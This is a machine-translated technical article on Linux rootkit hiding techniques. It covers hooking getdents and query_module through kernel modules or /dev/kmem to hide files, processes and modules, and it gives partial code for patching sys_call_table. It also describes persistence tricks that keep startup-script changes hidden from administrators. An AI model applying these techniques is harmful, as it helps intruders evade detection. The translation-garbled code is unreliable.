Advanced hiding technology in Linux environment

Advanced hiding technology in Linux environment _unix Linux

Last Update:2017-01-18 Source: Internet

Author: User

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Absrtact: This paper deeply analyzes the advanced hiding technologies of files, processes and modules in Linux environment, including: Linux can unload module programming technology, modify memory image directly to system call modification technology, through the virtual file system proc Hide specific process technology.

Hidden technology is widely used in computer system security, especially in network attacks, when an attacker successfully invades a system, it becomes particularly important to effectively hide the attacker's files, processes, and loaded modules. This article will discuss the advanced hiding technologies for files, processes, and modules in Linux systems that have been widely used in a variety of backdoor or security detection procedures, while others are just beginning and still in the discussion phase with few applications.

1. Hidden Technology

Interrupt control and system call under 1.1.Linux

The Intel x86 series microcomputer supports 256 interrupts and, in order for the processor to easily identify each interrupt source, it is numbered from 0~256, that is, given an interrupt type code N,intel called the interrupt vector.

Linux uses an interrupt vector (128 or 0x80) to implement system calls, all system calls through the unique portal System_call to enter the kernel, when the user dynamic process to execute an int 0x80 assembly instructions, the CPU switched to the kernel state, and began to execute SYSTEM_ The call function, System_call function, then executes the address of the corresponding system call by the System invocation table sys_call_table. The address of all system call functions is stored in the system call table Sys_call_table, and each address can be indexed by system call number, for example, Sys_call_table[nr_fork] index to the address of the system call Sys_fork ().

Linux uses an interrupt descriptor (8 bytes) to represent information about each interrupt, in the following format:

Offset 31....16 Some flags, type codes, and reserved bits
Segment Selector Offset 15....0

All interrupt descriptors are stored in a contiguous address space, the contiguous address space called the Interrupt Descriptor (IDT), whose starting address is stored in the Interrupt descriptor Register (IDTR) in the following format:

32-bit base address value boundary

The corresponding links for each of these structures can be expressed as follows:

Through the above instructions can be obtained through the IDTR register to find the System_call function address: According to the IDTR register to find the Interrupt Descriptor table, interrupt descriptor Table 0x80 is the address of the System_call function, this address will be applied in the discussion later.

1.2.Linux lkm (loadable kernel module) technology

The Linux system provides a modular mechanism for the kernel to maintain a smaller volume and facilitate functional expansion. Modules are part of the kernel, but are not compiled into the kernel, they are compiled into target files, dynamically inserted into the kernel or removed from the kernel as needed during the run. Because modules are run as part of the Linux kernel after insertion, module programming is essentially kernel programming, so you can use some of the resources exported by the kernel in the module, such as the address of the system call table (Sys_call_table), which was previously exported by the Linux2.4.18 version. This allows you to change the system call by directly modifying the portal of the system call based on the address. initialization functions and scavenging functions must exist in module programming, and in general, these two functions default to Init_module () and Clearup_module (). Starting with the 2.3.13 kernel version, the user can also rename the two functions, which are called when the module is inserted into the system, where functions and symbols can be registered, and the purge function is invoked when the module removes the system, and some recovery work is usually done in the function.

Memory image under 1.3.Linux

/dev/kmem is a character device that is the image of the main memory of the computer, through which you can test and even modify the system, which can be used to hide files, processes, or modules by modifying the system call when the kernel does not export sys_call_table addresses or when inserting modules.

1.4.proc File System

Proc File system is a virtual file system, which is implemented through the interface of file system, which is used to output system running state. It provides an interface for the communication between the operating system itself and the application process in the form of a file system, enabling the application to secure and easily access the internal data information of the current state of the system, and to modify the configuration information of some systems. Because Proc is implemented as a file system interface, it can be accessed like a normal file, but it exists only in memory.

2. Technical Analysis

2.1 Hidden files

The system call used to query for file information in a Linux system is sys_getdents, which can be observed by strace, for example strace LS will list the system calls used by command LS, from which it can be found that LS is performed through sys_getedents. When querying the relevant information of a file or directory, the Linux system uses sys_getedents to perform the appropriate query operations and transmits the resulting information to the user's space-running program, so if you modify the system call, remove the information related to the particular file in the result. Then all programs that use the system call will not see the file, thus achieving the hidden purpose. First, introduce the original system call, which is the prototype:
int sys_getdents (unsigned int fd, struct dirent *dirp,unsigned int count)
Where FD is a file descriptor pointing to the directory file, which reads the corresponding dirent structure from the directory file to which the FD points, and puts it in the DIRP, where count is the amount of data returned in DIRP, and the function returns the number of bytes filled to dirp when it is correct. The following figure is the modified system call Hacked_getdents execution process.

The hacked_getdents function in the diagram actually calls the original system call and then removes the file information associated with a particular file name from the resulting dirent structure, so that the application will not see the file's presence when it returns from the system call.

It should be noted that some newer versions of the SYS_GETDENTS64 to query the file information, but its implementation is basically the same as sys_getdents, so in these versions can still be similar to the above method to modify the system calls, hidden files.

2.2 Hidden Modules

The above analysis of how to modify system calls to hide a specific name of the file, in the actual processing, the module is often used to modify the purpose of the system call, but when inserting a module, if not take any hidden measures, it is easy to be found by the other side, once the other side found and unloaded the inserted module, All the files that use the module to hide are exposed, so you should continue to analyze how to hide the module for a particular name. The system call used to query module information in Linux is Sys_query_module, so it is possible to hide specific modules by modifying the system call. First explain the original system call, the original system call prototype is:
int sys_query_module (const char *name, int which, void *buf, size_t bufsize, size_t *ret)
If the parameter name is not empty, access to a specific module, otherwise the kernel module is accessed, parameter which describes the type of query, when Which=qm_modules, returns all the currently inserted module names, buff, and the number of modules in the RET, Buffsize is the size of the BUF buffer. In the process of module hiding, it is necessary to deal with the which=qm_modules situation to achieve the goal. The modified system call works as follows:

1 calls the original system call, error returns the error code;
2 if the which is not equal to qm_modules, then do not need to process, directly return.
3 from the beginning of the BUF, if there is a specific name, then the next module name will be overwritten with the name.
4) Repeat 3 until all the names are processed and the correct return is done.

2.3 Hidden processes

There is no system call for direct query process information in Linux, similar to PS query process Information command is through the query proc file system to achieve, in the background knowledge has been introduced proc file system, because it applies file system interface implementation, As a result, you can also hide files in the proc file system using hidden files, just add the proc file system to the hacked_getdents above. Since proc is a special file system that exists only in memory and does not exist on any actual device, the Linux kernel assigns it a specific main device number 0 and a specific secondary device number 1, in addition to having no corresponding I node on the external storage, So the system also assigns it a special node number Proc_root_ino (the value is 1), and the number 1th index node on the device is reserved. Through the above analysis, we can determine whether a file belongs to the proc file system:

1) to obtain the corresponding INODE structure of the file Dinode;
2 if (Dinode->i_ino = = Proc_root_ino &&! MAJOR (Dinode->i_dev) && MINOR (dinode->i _dev) = = 1) {This file belongs to the proc file system}

With the above analysis, the pseudo code for hiding a particular process is shown:

hacket_getdents (unsigned int fd, struct dirent *dirp, unsigned int count)
{

Call the original system call;

The node corresponding to the FD is obtained;

if (the file belongs to the proc file system && the file name needs to be hidden)
{Remove the file related information from DIRP}
}

2.4 Ways to modify system calls

Now that you have resolved how to modify system calls to achieve hidden purposes, how do you replace the original with the modified system call? This problem is often the most critical in practical applications, and the following will discuss how to do this in different situations.

(1) When the system exports sys_call_table and supports a dynamic plug-in module:

This kernel configuration is very common before the Linux kernel 2.4.18 version. In this case, it is very easy to modify the system call, just modify the corresponding sys_call_table table entry so that it points to the new system call. The following code is appropriate:

int orig_getdents (unsigned int fd, struct dirent *dirp, unsigned int count)
int init_module (void)
/* Initialization Module/*
{
Orig_getdents=sys_call_table[sys_getdents]; Save the original system call
Orig_query_module=sys_call_table[sys_query_module]
sys_call_table[sys_getdents]=hacked_getdents; Setting up a new system call
Sys_call_table[sys_query_module]=hacked_query_module;
return 0; Return 0 indicates success
}
void Cleanup_module (void)
/* Uninstall Module * *
{
sys_call_table[sys_getdents]=orig_getdents; Restoring the original system call
Sys_call_table[sys_query_module]=orig_query_module;
}

(2) In cases where the system does not export sys_call_table:

The Linux kernel will not be able to get the address of the system call table directly after 2.4.18, for security reasons, so that you must find another way to get the address. It is mentioned in the background that/dev/kmem is an image of the system main memory, which can be queried to find the address of the sys_call_table and modify it to use the new system call. So how do you find Sys_call_table's address in the system image? Let's take a look at how System_call's source code is going to implement system calls (see/arch/i386/kernel/entry. S):

ENTRY (System_call)
PUSHL%eax # Save Orig_eax
Save_all
Get_current (%EBX)
Cmpl $ (nr_syscalls),%eax
Jae Badsys
Testb $0x02,tsk_ptrace (%EBX) # Pt_tracesys
Jne Tracesys
Call *symbol_name (sys_call_table) (,%eax,4)
MOVL%eax,eax (%ESP) # Save the return value
ENTRY (Ret_from_sys_call)

This source code first saves the value of the corresponding register, and then determines whether the system call number (in the EAX register) is legitimate, followed by the setting of debugging, after all these, using call *symbol_name (sys_call_table) (,%eax,4) to the corresponding system call for processing, where the Symbol_name (sys_call_table) is the sys_call_table address. From the above analysis, it can be seen that when the System_call function is found, the location of sys_call_table can be determined by using character matching to find the corresponding Call statement, because the machine script for Call something (,%eax,4) is 0xFF 0x14 0x85. So it's OK to match this script. As to how to determine the System_call address in the background knowledge has been introduced, the following is given the pseudo code:

struct{//The meaning of each field can refer to background knowledge about the introduction of the IDTR Register
unsigned short limit;
unsigned int base;
}__ATTRIBUTE__ ((packed)) IDTR;
struct{//The meaning of each field can refer to the background knowledge about the interrupt descriptor
unsigned short off1;
unsigned short sel;
unsigned char none,flags;
unsigned short off2;
}__ATTRIBUTE__ ((packed)) IDT;
int kmem;
/* The following function is used to read the SZ bytes to memory m from the offset of the kemem corresponding file.
void Readkmem (void *m,unsigned off,int sz) {...}
/* The following function is used to read count bytes from src to dest.
void Weitekmem (void *src,void *dest,unsigned int count) {. ...}
unsigned SCT; Used to store sys_call_table addresses.
Char buff[100]; The first 100 bytes for storing the System_call function.
Char *p;
if ((Kmem=open ("/dev/kmem", o_rdonly)) <0)
return 1;
ASM ("Sidt%0"　　　　　　　　　　": =m" (IDTR); Read the value of the IDTR register to the IDTR structure
Readkmem (&idt,idtr.base+8*0x80,sizeof (IDT))//Read 0x80 descriptor to IDT structure
Sys_ call_off= (idt.off2<<16) |idt.off1; Gets the address of the System_call function.
Readkmem (buff,sys_call_off,100)/read the first 100 bytes of the System_call function to buff
p= (char *) Memmem (buff,100, "xffx14x85", 3); Get the address of the call statement corresponding to the machine code
sct= (unsigned *) (P+3)//Get sys_call_table address.

So far, the location of the sys_call_table in memory, so that the corresponding system call can be found according to the system call number of the corresponding address, modify the address can be modified to use the new system tuning functions, specific practices are as follows:

Readkmem (&orig_getdents,sct+ sys_getdents*4,4)//Save the original system call
Readkmem (&orig_query_module,sct+sys_query_module*4,4);
Writekmem (hacked_getdents,sct+sys_getdents*4,4);/Set up a new system call
Writekmem (hacket_query_module,sct+sys_query_module*4,4);

2.5 Other Related technologies

The above has completely solved the hidden technical problems, in practical applications, you can start the module or process code into the corresponding startup directory, assuming that your Linux run level of 3, you can add to the directory rc3.d (the directory is often stored in/ETC/RC.D or/ Etc directory), and then change the name of the script to a name that can be hidden. Another way is to include code that starts your module or process in some startup scripts, but this is easier to find, a solution is the process or module started immediately after the return to normal script, because the system shutdown will send the sighup signal to all processes, you can handle the signal in the process or module, Make the signal happen to modify the startup script, rejoin the boot module code, so that the next time the system boot can load this module, and the administrator to see the startup script will not find an exception.

3. Concluding remarks

In this paper, some advanced hiding technologies in Linux environment are analyzed and studied, and the technology involved can not only be used in system security, but also have important reference meaning in other aspects. Because of the open nature of Linux, it is important to avoid the first intrusion if the attacker can make more changes to the system once the root is obtained.

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More